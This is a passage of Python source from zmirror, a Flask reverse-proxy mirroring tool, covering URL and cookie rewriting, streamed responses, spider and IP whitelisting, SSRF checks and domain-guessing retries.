# for "key":"value" type replace, we must have at least one '/' in url path (for the value to be regard as url)
or (':' in prefix and '/' not in path)
# if we have quote_left, it must equals to the right
or (quote_left and quote_left != quote_right)
# in javascript, those 'path' contains one or only two slash, should not be rewrited (for potential error)
# or (parse.mime == 'application/javascript' and path.count('/') < 2)
# in javascript, we only rewrite those with explicit scheme ones.
# v0.21.10+ in "key":"value" format, we should ignore those path without scheme
or (not scheme and ('javascript' in parse.mime or '"' in prefix))
):
dbgprint('returned_un_touch', whole_match_string, v=5)
return whole_match_string
# v0.19.0+ Automatic Domains Whitelist (Experimental)
if enable_automatic_domains_whitelist:
try_match_and_add_domain_to_rewrite_white_list(match_domain)
# dbgprint(match_obj.groups(), v=5)
domain = match_domain or parse.remote_domain
# dbgprint('rewrite match_obj:', match_obj, 'domain:', domain, v=5)
# skip if the domain are not in our proxy list
if domain not in allowed_domains_set:
# dbgprint('return untouched because domain not match', domain, whole_match_string, v=5)
return match_obj.group() # return raw, do not change
# this resource's absolute url path to the domain root.
# dbgprint('match path', path, "remote path", parse.remote_path, v=5)
path = urljoin(parse.remote_path, path) # type: str
# before Python 3.5, urljoin could not handle cases like urljoin("/", "../233") correctly, so handle it manually
if sys.version_info < (3, 5) and "/../" in path:
path = path.replace("/../", "/")
if not path.startswith("/"):
# 当整合后的path不以 / 开头时, 如果当前是主域名, 则不处理, 如果是外部域名则加上 / 前缀
path = "/" + path
# dbgprint('middle path', path, v=5)
if ':' not in parse.remote_domain: # the python's builtin urljoin has a bug, cannot join domain with port correctly
url_no_scheme = urljoin(domain + '/', path.lstrip('/'))
else:
url_no_scheme = domain + '/' + path.lstrip('/')
# dbgprint('url_no_scheme', url_no_scheme, v=5)
# add extdomains prefix in path if need
if domain in external_domains_set:
path = '/extdomains/' + url_no_scheme
# dbgprint('final_path', path, v=5)
if enable_static_resource_CDN and url_no_scheme in url_to_use_cdn:
# dbgprint('We Know:', url_no_scheme, v=5)
_this_url_mime_cdn = url_to_use_cdn[url_no_scheme][0]
else:
# dbgprint('We Don\'t know:', url_no_scheme,v=5)
_this_url_mime_cdn = False
# Apply CDN domain
if _this_url_mime_cdn:
# pick a CDN domain deterministically from a checksum of the url path
# choosing like this (instead of randomly) keeps the same url on the same CDN domain, which raises the CDN cache hit rate.
# CDN rewrite, rewrite static resources to cdn domains.
# A lot of cases included, the followings are just the most typical examples.
# http(s)://target.com/img/love_lucia.jpg --> http(s)://your.cdn.domains.com/img/love_lucia.jpg
# http://external.com/css/main.css --> http(s)://your.cdn.domains.com/extdomains/external.com/css/main.css
# http://external.pw/css/main.css --> http(s)://your.cdn.domains.com/extdomains/external.pw/css/main.css
replace_to_scheme_domain = my_host_scheme + CDN_domains[zlib.adler32(path.encode()) % cdn_domains_number]
# else: # parse.mime == 'application/javascript':
# replace_to_scheme_domain = '' # Do not use explicit url prefix in js, to prevent potential error
elif not scheme:
replace_to_scheme_domain = ''
elif 'http' not in scheme:
replace_to_scheme_domain = '//' + my_host_name
else:
replace_to_scheme_domain = myurl_prefix
reassembled_url = urljoin(replace_to_scheme_domain, path)
if _this_url_mime_cdn and cdn_redirect_encode_query_str_into_url:
reassembled_url = embed_real_url_to_embedded_url(
reassembled_url,
url_mime=url_to_use_cdn[url_no_scheme][1],
escape_slash=require_slash_escape
)
if require_slash_escape:
reassembled_url = s_esc(reassembled_url)
# reassemble!
# prefix: src= quote_left: "
# path: /extdomains/target.com/foo/bar.js?love=luciaZ
reassembled = prefix + quote_left + reassembled_url + quote_right + get_group('right_suffix', match_obj)
# dbgprint('---------------------', v=5)
return reassembled
@lru_cache(maxsize=256)
def is_ua_in_whitelist(ua_str):
"""
When a bot/spider request is about to be banned, check whether it is on the allowed whitelist.
Called by is_denied_because_of_spider().
:type ua_str: str
"""
ua_str = ua_str.lower()
if global_ua_white_name in ua_str:
return True
for allowed_ua in spider_ua_white_list:
if allowed_ua in ua_str:
return True
return False
@lru_cache(maxsize=256)
def is_denied_because_of_spider(ua_str):
"""检查user-agent是否因为是蜘蛛或机器人而需要ban掉"""
ua_str = ua_str.lower()
if 'spider' in ua_str or 'bot' in ua_str:
if is_ua_in_whitelist(ua_str):
infoprint("A Spider/Bot's access was granted", ua_str)
return False
infoprint('A Spider/Bot was denied, UA is:', ua_str)
return True
else:
return False
def load_ip_whitelist_file():
"""从文件加载ip白名单"""
set_buff = set()
if os.path.exists(zmirror_root(human_ip_verification_whitelist_file_path)):
with open(zmirror_root(human_ip_verification_whitelist_file_path), 'r', encoding='utf-8') as fp:
for line in fp:  # one IP per line, as written by append_ip_whitelist_file()
set_buff.add(line.strip())
return set_buff
def append_ip_whitelist_file(ip_to_allow):
"""写入ip白名单到文件"""
try:
with open(zmirror_root(human_ip_verification_whitelist_file_path), 'a', encoding='utf-8') as fp:
fp.write(ip_to_allow + '\n')
except: # coverage: exclude
errprint('Unable to write whitelist file')
traceback.print_exc()
def ip_whitelist_add(ip_to_allow, info_record_dict=None):
"""添加ip到白名单, 并写入文件"""
if ip_to_allow in single_ip_allowed_set:
return
dbgprint('ip white added', ip_to_allow, 'info:', info_record_dict)
single_ip_allowed_set.add(ip_to_allow)
is_ip_not_in_allow_range.cache_clear()
append_ip_whitelist_file(ip_to_allow)
# dbgprint(single_ip_allowed_set)
try:
with open(zmirror_root(human_ip_verification_whitelist_log), 'a', encoding='utf-8') as fp:
fp.write(datetime.now().strftime('%Y-%m-%d %H:%M:%S') + " " + ip_to_allow
+ " " + str(request.user_agent)
+ " " + repr(info_record_dict) + "\n")
except: # coverage: exclude
errprint('Unable to write log file', os.path.abspath(human_ip_verification_whitelist_log))
traceback.print_exc()
@lru_cache(maxsize=256)
def is_ip_not_in_allow_range(ip_address):
"""判断ip是否在白名单中"""
if ip_address in single_ip_allowed_set:
return False
ip_address_obj = ipaddress.ip_address(ip_address)
for allowed_network in human_ip_verification_default_whitelist_networks:
if ip_address_obj in allowed_network:
return False
return True
# ########## End utils ###############
# ################# Begin Server Response Handler #################
def preload_streamed_response_content_async(requests_response_obj, buffer_queue):
"""
In stream mode, pre-read the remote response's content into a buffer queue.
:param requests_response_obj: the requests response object being streamed
:type buffer_queue: queue.Queue
"""
for particle_content in requests_response_obj.iter_content(stream_transfer_buffer_size):
try:
buffer_queue.put(particle_content, timeout=10)
except queue.Full: # coverage: exclude
traceback.print_exc()
exit()
if verbose_level >= 3: dbgprint('BufferSize', buffer_queue.qsize())
buffer_queue.put(None, timeout=10)
exit()
def iter_streamed_response_async():
"""异步, 一边读取远程响应, 一边发送给用户"""
total_size = 0
_start_time = time()
_content_buffer = b''
_disable_cache_temporary = False
buffer_queue = queue.Queue(maxsize=stream_transfer_async_preload_max_packages_size)
t = threading.Thread(
target=preload_streamed_response_content_async,
args=(parse.remote_response, buffer_queue),
daemon=True,
)
t.start()
while True:
try:
particle_content = buffer_queue.get(timeout=15)
except queue.Empty: # coverage: exclude
warnprint('WeGotAnSteamTimeout')
traceback.print_exc()
return
buffer_queue.task_done()
if particle_content is not None:
# streaming consumes the content as it is sent, so keep a separate copy for the cache
if local_cache_enable and not _disable_cache_temporary:
if len(_content_buffer) > 8 * 1024 * 1024: # 8MB
_disable_cache_temporary = True
_content_buffer = None
else:
_content_buffer += particle_content
yield particle_content
else:
if parse.url_no_scheme in url_to_use_cdn:
# 更新记录中的响应的长度
url_to_use_cdn[parse.url_no_scheme][2] = len(_content_buffer)
if local_cache_enable and not _disable_cache_temporary:
update_content_in_local_cache(parse.remote_url, _content_buffer,
method=parse.remote_response.request.method)
return
if verbose_level >= 4:
total_size += len(particle_content)
dbgprint('total_size:', total_size, 'total_speed(KB/s):',
total_size / 1024 / (time() - _start_time + 0.000001))
def copy_response(is_streamed=False):
"""
Copy and parse remote server's response headers, generate our flask response object
:type is_streamed: bool
:return: flask response object
:rtype: Response
"""
if is_streamed:
parse.time["req_time_body"] = 0
# stream the content asynchronously, without any rewriting; a generator is returned
content = iter_streamed_response_async()
else:
# without streaming, the content is (possibly) rewritten
content, parse.time["req_time_body"] = response_content_rewrite()
dbgprint('RemoteRespHeaders', parse.remote_response.headers)
# 创建基础的Response对象
resp = Response(content, status=parse.remote_response.status_code)
# --------------------- filter/rewrite the remote response headers and copy them into our response -----------------------
# A whitelist is applied: only remote response headers listed in `allowed_remote_response_headers` are sent back to the browser
for header_key in parse.remote_response.headers:
header_key_lower = header_key.lower()
# Add necessary response headers from the origin site, drop other headers
if header_key_lower in allowed_remote_response_headers:
if header_key_lower == 'location':
# rewrite the Location header of redirects into a zmirror url
_location = parse.remote_response.headers[header_key]
if custom_text_rewriter_enable:
# the Location header also goes through the custom rewrite function, with a special pseudo-MIME: mwm/headers-location
# this may be split out into a dedicated custom rewrite hook in the future
_location = custom_response_text_rewriter(_location, 'mwm/headers-location', parse.remote_url)
resp.headers[header_key] = encode_mirror_url(_location)
elif header_key_lower == 'content-type':
# force add utf-8 to content-type if it is text
if is_mime_represents_text(parse.mime) and 'utf-8' not in parse.content_type:
resp.headers[header_key] = parse.mime + '; charset=utf-8'
else:
resp.headers[header_key] = parse.remote_response.headers[header_key]
elif header_key_lower in ('access-control-allow-origin', 'timing-allow-origin'):
if custom_allowed_origin is None:
resp.headers[header_key] = myurl_prefix
elif custom_allowed_origin == '_*_': # coverage: exclude
_origin = request.headers.get('origin') or request.headers.get('Origin') or myurl_prefix
resp.headers[header_key] = _origin
else:
resp.headers[header_key] = custom_allowed_origin
else:
resp.headers[header_key] = parse.remote_response.headers[header_key]
# If we have the Set-Cookie header, we should extract the raw ones
# and then change the cookie domain to our domain
if header_key_lower == 'set-cookie':
for cookie_string in response_cookies_deep_copy():
resp.headers.add('Set-Cookie', response_cookie_rewrite(cookie_string))
dbgprint('OurRespHeaders:\n', resp.headers)
return resp
# noinspection PyProtectedMember
def response_cookies_deep_copy():
"""
It's a BAD hack to get the RAW Set-Cookie headers, but so far we don't have a better way.
We go DEEP inside urllib's private attributes to get the raw headers.
raw_headers example:
[('Cache-Control', 'private'),
('Content-Length', '48234'),
('Content-Type', 'text/html; Charset=utf-8'),
('Server', 'Microsoft-IIS/8.5'),
('Set-Cookie','BoardList=BoardID=Show; expires=Mon, 02-May-2016 16:00:00 GMT; path=/'),
('Set-Cookie','aspsky=abcefgh; expires=Sun, 24-Apr-2016 16:00:00 GMT; path=/; HttpOnly'),
('Set-Cookie', 'ASPSESSIONIDSCSSDSSQ=OGKMLAHDHBFDJCDMGBOAGOMJ; path=/'),
('X-Powered-By', 'ASP.NET'),
('Date', 'Tue, 26 Apr 2016 12:32:40 GMT')]
"""
raw_headers = parse.remote_response.raw._original_response.headers._headers
header_cookies_string_list = []
for name, value in raw_headers:
if name.lower() == 'set-cookie':
if my_host_scheme == 'http://':
value = value.replace('Secure;', '')
value = value.replace(';Secure', ';')
value = value.replace('; Secure', ';')
if 'httponly' in value.lower():
if enable_aggressive_cookies_path_rewrite:
# aggressive cookie path rewrite: rewrite every path to /
value = regex_cookie_path_rewriter.sub('path=/;', value)
elif enable_aggressive_cookies_path_rewrite is not None:
# rewrite the path of HttpOnly cookies to live under the current mirror prefix
# eg (/extdomains/a.foobar.com): path=/verify; -> path=/extdomains/a.foobar.com/verify
if parse.remote_domain not in domain_alias_to_target_set: # do not rewrite main domains
value = regex_cookie_path_rewriter.sub(
r'\g<prefix>=/extdomains/' + parse.remote_domain + r'\g<path>', value)
header_cookies_string_list.append(value)
return header_cookies_string_list
def response_content_rewrite():
"""
Rewrite the urls inside the remote response content. Binary content is skipped automatically (based on MIME).
:return: Tuple[bytes, float]
"""
_start_time = time()
_content = parse.remote_response.content
req_time_body = time() - _start_time
if not is_mime_represents_text(parse.mime):
# simply don't touch binary response content
dbgprint('Binary', parse.content_type)
return _content, req_time_body
# Do text rewrite if remote response is text-like (html, css, js, xml, etc..)
if verbose_level >= 3: dbgprint('Text-like', parse.content_type,
parse.remote_response.text[:15], _content[:15])
# do our own encoding detection, because requests' built-in detection performs poorly on GBK content
encoding = encoding_detect(parse.remote_response.content)
if encoding is not None:
parse.remote_response.encoding = encoding
# simply copy the raw text, for custom rewriter function first.
resp_text = parse.remote_response.text
if developer_string_trace is not None and developer_string_trace in resp_text:
# debug用代码, 对正常运行无任何作用
infoprint('StringTrace: appears in the RAW remote response text, code line no. ', current_line_number())
# try to apply custom rewrite function
if custom_text_rewriter_enable:
resp_text2 = custom_response_text_rewriter(resp_text, parse.mime, parse.remote_url)
if isinstance(resp_text2, str):
resp_text = resp_text2
elif isinstance(resp_text2, tuple) or isinstance(resp_text2, list):
resp_text, is_skip_builtin_rewrite = resp_text2
if is_skip_builtin_rewrite:
infoprint('Skip_builtin_rewrite', request.url)
return resp_text.encode(encoding='utf-8'), req_time_body
if developer_string_trace is not None and developer_string_trace in resp_text:
# debug用代码, 对正常运行无任何作用
infoprint('StringTrace: appears after custom text rewrite, code line no. ', current_line_number())
# then do the normal rewrites
resp_text = response_text_rewrite(resp_text)
if developer_string_trace is not None and developer_string_trace in resp_text:
# debug用代码, 对正常运行无任何作用
infoprint('StringTrace: appears after builtin rewrite, code line no. ', current_line_number())
# inject custom content into the page
# see the `Custom Content Injection` section of default_config.py for details
if custom_inject_content and parse.mime == "text/html":
for position, items in custom_inject_content.items():  # iterate over every configured position
for item in items:  # every item at this position
# skip the item if its url regex does not match the current url
r = item.get("url_regex")
if r is not None and not r.match(parse.url_no_scheme):
continue
# 将内容插入到html
resp_text = inject_content(position, resp_text, item["content"])
return resp_text.encode(encoding='utf-8'), req_time_body # return bytes
def response_text_basic_rewrite(*args, **kwargs): # coverage: exclude
"""本函数在v0.28.3被移除, 对本函数的调用会被映射出去
如果需要查看本函数代码, 请查看git历史到 v0.28.3 以前
"""
from warnings import warn
warn("This function is deprecated since v0.28.3, use response_text_basic_mirrorlization() instead", DeprecationWarning)
return response_text_basic_mirrorlization(*args, **kwargs)
def response_text_rewrite(resp_text):
"""
rewrite urls in text-like content (html,css,js)
:type resp_text: str
:rtype: str
"""
# v0.20.6+ plain replace domain alias, support json/urlencoded/json-urlencoded/plain
if url_custom_redirect_enable:
for before_replace, after_replace in (plain_replace_domain_alias + parse.temporary_domain_alias):
resp_text = resp_text.replace(before_replace, after_replace)
# v0.9.2+: advanced url rewrite engine
resp_text = regex_adv_url_rewriter.sub(regex_url_reassemble, resp_text)
if developer_string_trace is not None and developer_string_trace in resp_text:
# debug用代码, 对正常运行无任何作用
infoprint('StringTrace: appears after advanced rewrite, code line no. ', current_line_number())
# v0.28.0 实验性功能, 在v0.28.3后默认启用
resp_text = response_text_basic_mirrorlization(resp_text)
if developer_string_trace is not None and developer_string_trace in resp_text:
# debug用代码, 对正常运行无任何作用
infoprint('StringTrace: appears after basic mirrorlization, code line no. ', current_line_number())
# for cookies set string (in js) replace
# eg: ".twitter.com" --> "foo.com"
resp_text = resp_text.replace('\".' + target_domain_root + '\"', '\"' + my_host_name_no_port + '\"')
resp_text = resp_text.replace("\'." + target_domain_root + "\'", "\'" + my_host_name_no_port + "\'")
resp_text = resp_text.replace("domain=." + target_domain_root, "domain=" + my_host_name_no_port)
resp_text = resp_text.replace('\"' + target_domain_root + '\"', '\"' + my_host_name_no_port + '\"')
resp_text = resp_text.replace("\'" + target_domain_root + "\'", "\'" + my_host_name_no_port + "\'")
if developer_string_trace is not None and developer_string_trace in resp_text:
# debug用代码, 对正常运行无任何作用
infoprint('StringTrace: appears after js cookies string rewrite, code line no. ', current_line_number())
# resp_text = resp_text.replace('lang="zh-Hans"', '', 1)
return resp_text
def response_cookie_rewrite(cookie_string):
"""
rewrite response cookie string's domain to `my_host_name`
:type cookie_string: str
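Illustrative example: "sid=1; domain=.twitter.com; path=/" becomes
"sid=1; domain=<my_host_name_no_port>; path=/" (only the domain attribute is rewritten).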
"""
cookie_string = regex_cookie_rewriter.sub('domain=' + my_host_name_no_port, cookie_string)
return cookie_string
# ################# End Server Response Handler #################
# ################# Begin Client Request Handler #################
def assemble_remote_url():
"""
Assemble the target-server URL, i.e. produce the value of parse.remote_url.
:rtype: str
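Illustrative example: for a client request to /extdomains/foo.com/bar?x=1 (with foo.com being
an external domain), parse.remote_url becomes "https://foo.com/bar?x=1" or "http://foo.com/bar?x=1",
depending on is_target_domain_use_https("foo.com").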
"""
if parse.is_external_domain:
# the request targets an external domain
scheme = 'https://' if parse.is_https else 'http://'
return urljoin(scheme + parse.remote_domain, parse.remote_path_query)
else:
# the request targets the main domain or one of its aliases
return urljoin(target_scheme + target_domain, parse.remote_path_query)
def ssrf_check_layer_1():
"""
SSRF protection, layer 1; called at the very start of a request to check whether the domain is allowed.
:return: True if the request triggered the SSRF protection
:rtype: bool
"""
# Only external in-zone domains are allowed (SSRF check layer 1)
if parse.remote_domain not in allowed_domains_set:
if not try_match_and_add_domain_to_rewrite_white_list(parse.remote_domain):  # does the requested domain match a whitelist wildcard?
if developer_temporary_disable_ssrf_prevention:  # has SSRF prevention been temporarily disabled in the settings?
add_ssrf_allowed_domain(parse.remote_domain)
return False
else:
return True
return False
def extract_client_header():
"""
Extract the necessary client headers and filter out the rest.
Browser request headers are handled with a blacklist: blacklisted headers are removed, all others are kept.
zmirror drops the host and content-length headers
and rewrites the cookie header, replacing any occurrence of the mirror's own domain with the remote server's domain.
:return: the rewritten request headers
:rtype: dict
"""
rewrited_headers = {}
dbgprint('BrowserRequestHeaders:', request.headers)
for head_name, head_value in request.headers:
head_name_l = head_name.lower()  # normalize header names to lowercase for consistent matching
# ------------------ handling of special request headers -------------------
if head_name_l in ('host', 'content-length'):
# drop these two browser headers; they are regenerated when zmirror sends its own request
continue
elif head_name_l == 'content-type' and head_value == '':
# skip a blank content-type in the request headers
# in flask's request object the content-type header always exists, whether or not the browser sent one;
# an empty value means the header was not really there, so drop it
continue
elif head_name_l == 'accept-encoding' and ('br' in head_value or 'sdch' in head_value):
# some modern browsers advertise the sdch and br encodings, which requests cannot decode, so strip those tokens from the header
# For Firefox, they may send 'Accept-Encoding: gzip, deflate, br'
# For Chrome, they may send 'Accept-Encoding: gzip, deflate, sdch, br'
# however, requests cannot decode the br encode, so we have to remove it from the request header.
_str_buff = ''
if 'gzip' in head_value:
_str_buff += 'gzip, '
if 'deflate' in head_value:
_str_buff += 'deflate'
if _str_buff:
rewrited_headers[head_name_l] = _str_buff
continue
else:
# ------------------ all other request headers -------------------
# every other header is kept after one pass of content rewriting
rewrited_headers[head_name_l] = client_requests_text_rewrite(head_value)
# strip zmirror_verify from the cookie header
if head_name_l == "cookie":
rewrited_headers[head_name_l] = regex_remove__zmirror_verify__header.sub(
"",
rewrited_headers[head_name_l],
)
dbgprint('FilteredBrowserRequestHeaders:', rewrited_headers)
return rewrited_headers
# noinspection SpellCheckingInspection
def client_requests_text_rewrite(raw_text):
"""
Rewrite proxy domain to origin domain, extdomains supported.
Also Support urlencoded url.
This usually used in rewriting request params
eg. http://foo.bar/extdomains/accounts.google.com to http://accounts.google.com
eg2. foo.bar/foobar to www.google.com/foobar
eg3. http%3a%2f%2fg.zju.tools%2fextdomains%2Faccounts.google.com%2f233
to http%3a%2f%2faccounts.google.com%2f233
:type raw_text: str
:rtype: str
"""
def replace_to_real_domain(match_obj):
scheme = get_group("scheme", match_obj) # type: str
colon = match_obj.group("colon") # type: str
scheme_slash = get_group("scheme_slash", match_obj) # type: str
_is_https = bool(get_group("is_https", match_obj)) # type: bool
real_domain = match_obj.group("real_domain") # type: str
result = ""
if scheme:
if "http" in scheme:
if _is_https or is_target_domain_use_https(real_domain):
result += "https" + colon
else:
result += "http" + colon
result += scheme_slash * 2
result += real_domain
return result
# one pass of a fairly complex regex substitution; afterwards, in theory, all /extdomains/ parts have been removed
# see regex_request_rewriter_extdomains near the top of this file for the pattern itself
replaced = regex_request_rewriter_extdomains.sub(replace_to_real_domain, raw_text)
if developer_string_trace is not None and developer_string_trace in replaced:
# debug用代码, 对正常运行无任何作用
infoprint('StringTrace: appears client_requests_text_rewrite, code line no. ', current_line_number())
# regex-replace bare occurrences of the main mirror domain (without /extdomains/)
replaced = regex_request_rewriter_main_domain.sub(target_domain, replaced)
# as a safety net, do one more plain string replacement
replaced = replaced.replace(my_host_name, target_domain)
dbgprint('ClientRequestedUrl: ', raw_text, '<- Has Been Rewrited To ->', replaced)
return replaced
def extract_url_path_and_query(full_url=None, no_query=False):
"""
Convert http://foo.bar.com/aaa/p.html?x=y to /aaa/p.html?x=y
:param no_query:
:type full_url: str
:param full_url: full url
:return: str
"""
if full_url is None:
full_url = request.url
split = urlsplit(full_url)
result = split.path or "/"
if not no_query and split.query:
result += '?' + split.query
return result
# ################# End Client Request Handler #################
# ################# Begin Middle Functions #################
def send_request(url, method='GET', headers=None, param_get=None, data=None):
"""实际发送请求到目标服务器, 对于重定向, 原样返回给用户
被request_remote_site_and_parse()调用"""
final_hostname = urlsplit(url).netloc
dbgprint('FinalRequestUrl', url, 'FinalHostname', final_hostname)
# Only external in-zone domains are allowed (SSRF check layer 2)
if final_hostname not in allowed_domains_set and not developer_temporary_disable_ssrf_prevention:
raise ConnectionAbortedError('Trying to access an OUT-OF-ZONE domain(SSRF Layer 2):', final_hostname)
# set zero data to None instead of b''
if not data:
data = None
prepped_req = requests.Request(
method,
url,
headers=headers,
params=param_get,
data=data,
).prepare()
# get session
if enable_connection_keep_alive:
_session = connection_pool.get_session(final_hostname)
else:
_session = requests.Session()
# Send real requests
parse.time["req_start_time"] = time()
r = _session.send(
prepped_req,
proxies=requests_proxies,
allow_redirects=False,
stream=enable_stream_content_transfer,
verify=not developer_do_not_verify_ssl,
)
# remote request time
parse.time["req_time_header"] = time() - parse.time["req_start_time"]
dbgprint('RequestTime:', parse.time["req_time_header"], v=4)
# Some debug output
# print(r.request.headers, r.headers)
if verbose_level >= 3:
dbgprint(r.request.method, "FinalSentToRemoteRequestUrl:", r.url, "\nRem Resp Stat: ", r.status_code)
dbgprint("RemoteRequestHeaders: ", r.request.headers)
if data:
dbgprint('RemoteRequestRawData: ', r.request.body)
dbgprint("RemoteResponseHeaders: ", r.headers)
return r
def prepare_client_request_data():
"""
Parse the data sent by the browser.
If it is text, the content is rewritten and returned as str;
if it is binary, it is returned untouched (bytes).
:rtype: Union[str, bytes, None]
"""
data = request.get_data() # type: bytes
# try to detect the encoding of whatever the browser sent
encoding = encoding_detect(data)
if encoding is not None:
try:
data = data.decode(encoding=encoding) # type: str
except:
# decoding failed: data is binary or in an unknown encoding, return it untouched without rewriting
encoding = None
pass
else:
# data is text: rewrite it and return str
data = client_requests_text_rewrite(data) # type: str
# 下面这个if是debug用代码, 对正常运行无任何作用
if developer_string_trace: # coverage: exclude
if isinstance(data, str):
data = data.encode(encoding=encoding)
if developer_string_trace.encode(encoding=encoding) in data:
infoprint('StringTrace: appears after client_requests_bin_rewrite, code line no. ', current_line_number())
return data, encoding
def generate_our_response():
"""
Generate our response to the client.
:rtype: Response
"""
# copy and parse remote response
resp = copy_response(is_streamed=parse.streamed_our_response)
if parse.time["req_time_header"] >= 0.00001:
parse.set_extra_resp_header('X-Header-Req-Time', "%.4f" % parse.time["req_time_header"])
if parse.time.get("start_time") is not None and not parse.streamed_our_response:
# remote request time should be excluded when calculating total time
parse.set_extra_resp_header('X-Body-Req-Time', "%.4f" % parse.time["req_time_body"])
parse.set_extra_resp_header('X-Compute-Time',
"%.4f" % (process_time() - parse.time["start_time"]))
parse.set_extra_resp_header('X-Powered-By', 'zmirror/%s' % CONSTS.__VERSION__)
if developer_dump_all_traffics and not parse.streamed_our_response:
dump_zmirror_snapshot("traffic")
return resp
def parse_remote_response():
"""处理远程服务器的响应"""
# extract response's mime to thread local var
parse.content_type = parse.remote_response.headers.get('Content-Type', '')
parse.mime = extract_mime_from_content_type(parse.content_type)
# only_serve_static_resources
if only_serve_static_resources and not is_content_type_using_cdn(parse.content_type):
return generate_simple_resp_page(b'This site is just for static resources.', error_code=403)
# whether to stream the response content
# for flask streaming, see the official docs: http://flask.pocoo.org/docs/0.11/patterns/streaming/
# if streaming is enabled and the response MIME is among the streamed MIME types, stream it
# for more about stream mode, see the `enable_stream_content_transfer` section in config_default.py
# (in PyCharm you can Ctrl-click the variable below to jump to its definition)
parse.streamed_our_response = enable_stream_content_transfer and is_mime_streamed(parse.mime)
# extract cache control header, if not cache, we should disable local cache
parse.cache_control = parse.remote_response.headers.get('Cache-Control', '')
# decide whether the response may be cached; a rather conservative caching policy is applied
parse.cacheable = 'no-store' not in parse.cache_control and 'must-revalidate' not in parse.cache_control \
and "max-age=0" not in parse.cache_control and "private" not in parse.cache_control \
and parse.remote_response.request.method == 'GET' and parse.remote_response.status_code == 200
if verbose_level >= 4:
dbgprint('Response Content-Type:', parse.content_type,
'IsStreamed:', parse.streamed_our_response,
'cacheable:', parse.cacheable,
'Line', current_line_number(), v=4)
# add url's MIME info to record, for MIME-based CDN rewrite,
# next time we access this url, we would know it's mime
if enable_static_resource_CDN and parse.cacheable:
# we should only cache GET method, and response code is 200
# noinspection PyUnboundLocalVariable
if parse.url_no_scheme not in url_to_use_cdn:
# work out the length of the remote response
if "Content-Length" in parse.remote_response.headers:
# if the server declared a length in its headers, just read it
length = parse.remote_response.headers.get("Content-Length")
elif parse.streamed_our_response:
# in stream mode the body cannot be read right away, so without a Content-Length we do not yet know its size;
# the actual length is computed while the response is being read, but it may be inaccurate
length = -1
else:
# without streaming, requests fetches the whole body at once, so its length can be measured directly
length = len(parse.remote_response.content)
# record information about this URL
url_to_use_cdn[parse.url_no_scheme] = [False, parse.mime, length]
if is_content_type_using_cdn(parse.mime):
# mark it to use cdn, and record it's url without scheme.
# eg: If SERVER's request url is http://example.com/2333?a=x, we record example.com/2333?a=x
# because the same url for http and https SHOULD be the same, drop the scheme would increase performance
url_to_use_cdn[parse.url_no_scheme][0] = True # 标记为使用CDN
dbgprint('CDN enabled for:', parse.url_no_scheme)
else:
dbgprint('CDN disabled for:', parse.url_no_scheme)
def guess_correct_domain(depth=7):
"""
Guess the correct domain for the requested url.
When the response code is 404 or 500, the request was quite possibly sent to the wrong domain,
and the right domain is very likely among the domains of the last few requests.
This function retries those recently used domains; if one of them answers 200,
the url is assumed to belong to that domain, which amounts to an implicit url rewrite.
* this function may modify `parse` and `request`
:rtype: Union[Response, None]
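Illustrative flow: if /some/page returns 404 on the current domain but one of the recently used
domains answers 200 for the same path, the request is silently re-targeted to that domain and the
mapping is remembered in domain_guess_cache.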
"""
current_domain = parse.remote_domain
sp = list(urlsplit(parse.remote_url))
redirected = None
for i, domain in enumerate(recent_domains.keys()[:depth]):
if domain == current_domain:
continue
sp[1] = domain # 设置域名
try:
# 尝试发送请求, 允许请求失败
resp = send_request(
urlunsplit(sp),
method=request.method,
headers=parse.client_header,
data=parse.request_data_encoded,
)
except: # coverage: exclude
continue
if 400 <= resp.status_code <= 599: # 40x or 50x, eg:404 503 500
# 失败
dbgprint("Domain guess failed:", domain, v=4)
if i != depth - 1 or redirected is None:
continue
else:
# when every attempt failed, fall back to a previously recorded redirect result, if any
resp, domain = redirected
elif 300 <= resp.status_code <= 399:
if i != depth - 1:
# redirect responses are stashed for now; they are only used if every other attempt fails
if redirected is None:
# if a redirect was already recorded earlier, later ones are discarded,
# because domains nearer the front of the recent list are more likely to be the real one
redirected = (resp, domain)
continue
elif redirected is not None:  # last round of the loop
# fall back to the redirect result recorded earlier
resp, domain = redirected
else:
continue
# 成功找到
dbgprint("domain guess successful, from", current_domain, "to", domain)
parse.set_extra_resp_header("X-Domain-Guess", domain)
# implicitly rewrite the domain
rewrited_url = encode_mirror_url(  # the rewritten url
parse.remote_path_query,
remote_domain=domain,
is_scheme=True,
)
dbgprint("Shadow rewriting, from", request.url, "to", rewrited_url)
request.url = rewrited_url
# 写入缓存
domain_guess_cache[(current_domain, request.path)] = domain
# 写log
try:
with open(zmirror_root("domain_guess.log"), "a", encoding="utf-8") as fw:
fw.write("{}\t{}\t{}\t-->\t{}\n".format(datetime.now(), current_domain, request.path, domain))
except: # coverage: exclude
pass
request.path = urlsplit(rewrited_url).path
# 重新生成 parse 变量
assemble_parse()
return resp
else:  # every attempt failed  # coverage: exclude
return None
def request_remote_site():
"""
Request the remote server (high-level); when it returns 404/500, retry via domain_guess.
"""
# request the mirrored site
# note: zmirror itself does not follow redirects; redirect responses are returned to the browser unchanged
parse.remote_response = send_request(
parse.remote_url,
method=request.method,
headers=parse.client_header,
data=parse.request_data_encoded,
)
if parse.remote_response.url != parse.remote_url:
warnprint("requests's remote url", parse.remote_response.url,
'does no equals our rewrited url', parse.remote_url)
if 400 <= parse.remote_response.status_code <= 599:
# 猜测url所对应的正确域名
dbgprint("Domain guessing for", request.url)
result = guess_correct_domain()
if result is not None:
parse.remote_response = result
def filter_client_request():
"""过滤用户请求, 视情况拒绝用户的访问
:rtype: Union[Response, None]
"""
dbgprint('Client Request Url: ', request.url)
# crossdomain.xml
if os.path.basename(request.path) == 'crossdomain.xml':
dbgprint('crossdomain.xml hit from', request.url)
return crossdomain_xml()
# Global whitelist ua
if check_global_ua_pass(str(request.user_agent)):
return None
if is_deny_spiders_by_403 and is_denied_because_of_spider(str(request.user_agent)):
return generate_simple_resp_page(b'Spiders Are Not Allowed To This Site', 403)
if human_ip_verification_enabled and (
((human_ip_verification_whitelist_from_cookies or enable_custom_access_cookie_generate_and_verify)
and must_verify_cookies)
or is_ip_not_in_allow_range(request.remote_addr)
):
dbgprint('ip', request.remote_addr, 'is verifying cookies')
if 'zmirror_verify' in request.cookies and \
((human_ip_verification_whitelist_from_cookies and verify_ip_hash_cookie(request.cookies.get('zmirror_verify')))
or (enable_custom_access_cookie_generate_and_verify and custom_verify_access_cookie(
request.cookies.get('zmirror_verify'), request))):
ip_whitelist_add(request.remote_addr, info_record_dict=request.cookies.get('zmirror_verify'))
